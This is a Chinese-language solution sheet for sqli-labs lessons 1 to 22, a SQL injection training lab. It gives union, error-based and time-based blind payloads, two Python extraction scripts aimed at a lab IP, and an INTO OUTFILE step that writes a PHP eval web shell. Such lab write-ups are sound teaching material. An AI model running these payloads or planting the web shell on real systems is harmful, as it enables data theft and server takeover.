[sqli-labs]Less1~22答案

Less-1
?id=1' order by 3
#页面显示正常,说明查询结果至少有 3 列
?id=1' order by 4
#报错 Unknown column '4' in 'order clause',说明查询结果正好是 3 列
?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+
# information_schema,challenges,mysql,performance_schema,security

?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') --+
# emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users') --+
# id,username,password
?id=666' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+

# Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
# Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Less-2
# 方法同上,不过此题的 id 是数字型,不需要闭合引号(注释符也可省略)
?id=666 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)
Less-3
?id=666') union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+ 
Less-4
?id=666") union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+ 
Less-5
# 页面没有显示位,无法使用联合查询注入,改用 floor() 报错注入(利用 rand(0) 与 group by 产生的重复键报错把数据带出)
# and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Subquery returns more than 1 row
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'users;1' for key 'group_key'
# 以此类推:改动 limit 的偏移量逐行取表名、列名和字段值;报错信息能带出的长度有限,所以用 limit 逐行取而不是 group_concat 一次取全部
Less-6
# 把'换成"
Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+
# path 需替换为 web 目录下的绝对路径;写文件要求数据库账户有 FILE 权限且 secure_file_priv 允许写到该目录。写入后用一句话木马客户端连接即可,连接密码为 my
Less-8
# '))改为'
Less-9&10
#区别是前者'后者"
#经过测试,页面对真假条件没有差异回显,是时间盲注,附上脚本(阈值按 sleep(1) 设置,目标延迟大时需调高,否则会误判):
# coding:utf-8
import requests
import datetime


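def database_len(url, max_len=9, *, get=None):  # 获取数据库名长度
    """Recover the length of the current database name by time-based probing.

    Sends ``length(database())>i`` probes for i = 1..max_len; the first probe
    that comes back without the injected sleep(1) delay means the length is
    exactly i.

    Args:
        url: Base URL of the vulnerable page; the query string is appended.
        max_len: Largest length to test (the original hard-coded 9).
        get: Optional callable used instead of ``requests.get`` (for testing).

    Returns:
        The recovered length as an int.

    Raises:
        RuntimeError: if every probe up to max_len was slow, i.e. the name is
            longer than max_len. The original silently returned 9 here.
    """
    if get is None:
        get = requests.get
    for i in range(1, max_len + 1):
        payload = '''?id=1' and if(length(database())>%s,sleep(1),0)''' % i
        # '%23' is a URL-encoded '#', commenting out the rest of the query.
        start = datetime.datetime.now()
        get(url + payload + '%23')
        elapsed = (datetime.datetime.now() - start).total_seconds()
        # A response of >= 1 s means sleep(1) fired, so the name is longer
        # than i. NOTE(review): a target with >= 1 s of plain latency gives
        # false positives; measure the baseline and raise the threshold then.
        if elapsed < 1:
            print('database_len:', i)
            return i
        print(i)
    raise RuntimeError('database name is longer than %d characters' % max_len)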


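def database_name(url, database_len, *, get=None):  # 获取数据库名
    """Recover the database name one character at a time by time-based probing.

    For each position j in 1..database_len, try every candidate character and
    keep the one whose probe triggers the injected sleep(1).

    Args:
        url: Base URL of the vulnerable page; the query string is appended.
        database_len: Number of characters to recover.
        get: Optional callable used instead of ``requests.get`` (for testing).

    Returns:
        The recovered name. Positions where no candidate matched are written
        as '?' so later characters stay aligned (the original silently skipped
        them and returned None).
    """
    if get is None:
        get = requests.get
    # '_' is included because schema names commonly contain it; the original
    # set lacked it and could not recover such names. NOTE(review): under a
    # case-insensitive collation '=' also matches upper-case letters, so the
    # recovered name comes out lower-cased.
    charset = '0123456789abcdefghijklmnopqrstuvwxyz_'
    chars = []
    for j in range(1, database_len + 1):
        for c in charset:
            payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % (
                j, c)
            start = datetime.datetime.now()
            get(url + payload + '%23')
            elapsed = (datetime.datetime.now() - start).total_seconds()
            # >= 1 s means sleep(1) fired: this character is at position j.
            if elapsed >= 1:
                chars.append(c)
                print(''.join(chars))
                break
        else:
            chars.append('?')
    name = ''.join(chars)
    print('database_name:', name)
    return name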


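if __name__ == '__main__':
    # Lab target; change it before pointing the script anywhere else.
    # Probing a host you are not authorised to test is illegal.
    url = '''http://43.247.91.228:84/Less-9/'''
    # Keep the result under its own name: the original rebound `database_len`
    # to an int, shadowing the function for the rest of the module.
    length = database_len(url)
    database_name(url, length)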
#database_name: security
Less-11
?uname=' or '1'='1&passwd=1'union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#' or '1'='1绕过
Less-12
?uname=") or ("1")=("1&passwd=1")union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#") or ("1")=("1绕过
Less-13
?uname=1') and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  #
# XPATH syntax error: ':security'
# 或者用 floor() 报错注入:
?uname=1') and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a)  #
# Duplicate entry 'security | 1' for key 'group_key'
Less-14
# 把 ') 换成 "
Less-15
#页面对错误输入没有任何回显,用万能密码测试确定闭合符是 ',然后进行基于 POST 的时间盲注;对之前的脚本做了升级,这次是多线程(各字符位并发探测,目标会同时执行多个 sleep,并发越高误判风险越大,阈值要留余量)
# coding:utf-8
import requests
import datetime
import threading


def database_len(url, i):
    """Probe whether the database name is longer than ``i`` characters.

    Posts ``admin' and if(length(database())>i,sleep(2),0) #`` as the
    username and treats a response that took at least 2 s as "sleep fired".

    Args:
        url: URL of the login form.
        i: Length to compare against.

    Returns:
        True when the name is longer than ``i`` (response delayed >= 2 s),
        False otherwise. Despite its name this returns a bool, not a length;
        ``main()`` derives the length from the first False.
    """
    probe = '''admin' and if(length(database())>%s,sleep(2),0) #''' % i
    form = {'uname': probe, 'passwd': '''1'''}
    started = datetime.datetime.now()
    requests.post(url, data=form)
    delay = datetime.datetime.now() - started
    # NOTE(review): >= 2 s of plain network latency is indistinguishable from
    # sleep(2); check the baseline before trusting the result.
    return delay.seconds >= 2


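def database_name(url, j, *, post=None):  # 获取数据库名
    """Recover character ``j`` (1-based) of the database name by timing.

    Tries each candidate character and returns the first one whose probe
    delays the response by the injected sleep(2).

    Args:
        url: URL of the login form.
        j: 1-based position in the database name.
        post: Optional callable used instead of ``requests.post`` (testing).

    Returns:
        The matched character, or '?' when no candidate matched. The original
        fell off the end and returned None, which made ``main()`` crash on
        ``str + None``.
    """
    if post is None:
        post = requests.post
    # '_' added: the original set could not recover names containing it.
    # NOTE(review): under a case-insensitive collation '=' also matches
    # upper-case letters, so the result comes out lower-cased.
    for c in '0123456789abcdefghijklmnopqrstuvwxyz_':
        postdata = {
            'uname': '''admin' and if(substr(database(),%d,1)='%s',sleep(2),1) #''' % (j, c),
            'passwd': '''1'''
        }
        start = datetime.datetime.now()
        post(url, data=postdata)
        elapsed = (datetime.datetime.now() - start).total_seconds()
        # >= 2 s means sleep(2) fired: c is the character at position j.
        if elapsed >= 2:
            return c
    return '?'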


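class MyThread(threading.Thread):
    """Thread that runs ``func(*args)`` and keeps the return value.

    ``threading.Thread`` discards the target's return value; this subclass
    stores it so the caller can read it after ``join()``.
    """

    def __init__(self, func, args):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args
        # Initialised here so getresult() before run() returns None instead
        # of raising AttributeError.
        self.res = None

    def getresult(self):
        """Return what ``func`` returned, or None if run() has not finished."""
        return self.res

    def run(self):
        self.res = self.func(*self.args)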


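def main():
    """Recover the database name of the Less-15 target with threaded probes.

    Step 1 fires nine length probes (lengths 1..9) concurrently and takes the
    first one reporting "not longer than i" as the length. Step 2 fires one
    thread per character position and joins the results in position order.

    Raises:
        RuntimeError: if none of the nine probes rejects its length, i.e. the
            name is longer than 9 characters. The original looped forever in
            this case (``flag`` never became False); it also crashed with a
            TypeError when a position probe returned None.
    """
    # Lab target; change it before pointing the script anywhere else.
    # Probing a host you are not authorised to test is illegal.
    url = '''http://43.247.91.228:84/Less-15/'''
    max_len = 9

    # Step 1: length. All probes run concurrently, so the target executes
    # several sleep(2) calls at once; keep max_len small.
    threads = [MyThread(database_len, (url, i)) for i in range(1, max_len + 1)]
    for t in threads:
        t.start()
    databaselength = None
    for i, t in enumerate(threads, start=1):
        t.join()
        # database_len() returns True while the name is longer than i, so the
        # first False pins the length to exactly i.
        if databaselength is None and not t.getresult():
            databaselength = i
    if databaselength is None:
        raise RuntimeError('database name is longer than %d characters' % max_len)
    print('database_len:', databaselength)

    # Step 2: one thread per position; results are joined in position order.
    threads = [MyThread(database_name, (url, j)) for j in range(1, databaselength + 1)]
    for t in threads:
        t.start()
    chars = []
    for t in threads:
        t.join()
        # database_name() may yield None when no candidate matched; keep the
        # position as '?' rather than crashing on str + None.
        chars.append(t.getresult() or '?')
    print("database_name :" + ''.join(chars))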


if __name__ == '__main__':
    # Entry point: runs only when the script is executed directly, not on import.
    main()

#database_len: 8
#database_name :security
Less-16
# 把 ' 改成 ")
Less-17
#尝试了一会儿发现这里必须先知道一个有效用户名才能注入,随便试了个 admin 发现可用;密码字段有语法报错回显,于是采用报错注入
?uname=admin&passwd=1' and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a)  #&submit=Submit
Less-18
#页面会回显 IP 和 User-Agent,修改 X-Forwarded-For 无效,于是尝试在 User-Agent 里注入(注意 payload 末尾用 and '1'='1 闭合引号,而不是用注释符)
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  and '1'='1
# XPATH syntax error:':security'
Less-19
#显示位在referer,所以尝试在这里注入
Referer:1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit
#"security;1"
Less-20
#在cookie里面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  and '1'='1
Less-21
Cookie: uname=JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICcxJz0nMQ==
# cookie 中的 uname 经过 base64 编码,payload 需先 base64 编码再放进 cookie(上面的值解码后就是 Less-20 的 payload)
Less-22
#和上题一样,不过把 ' 改成 "(在 base64 编码之前替换)
Cookie: uname=IiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICIxIj0iMQ==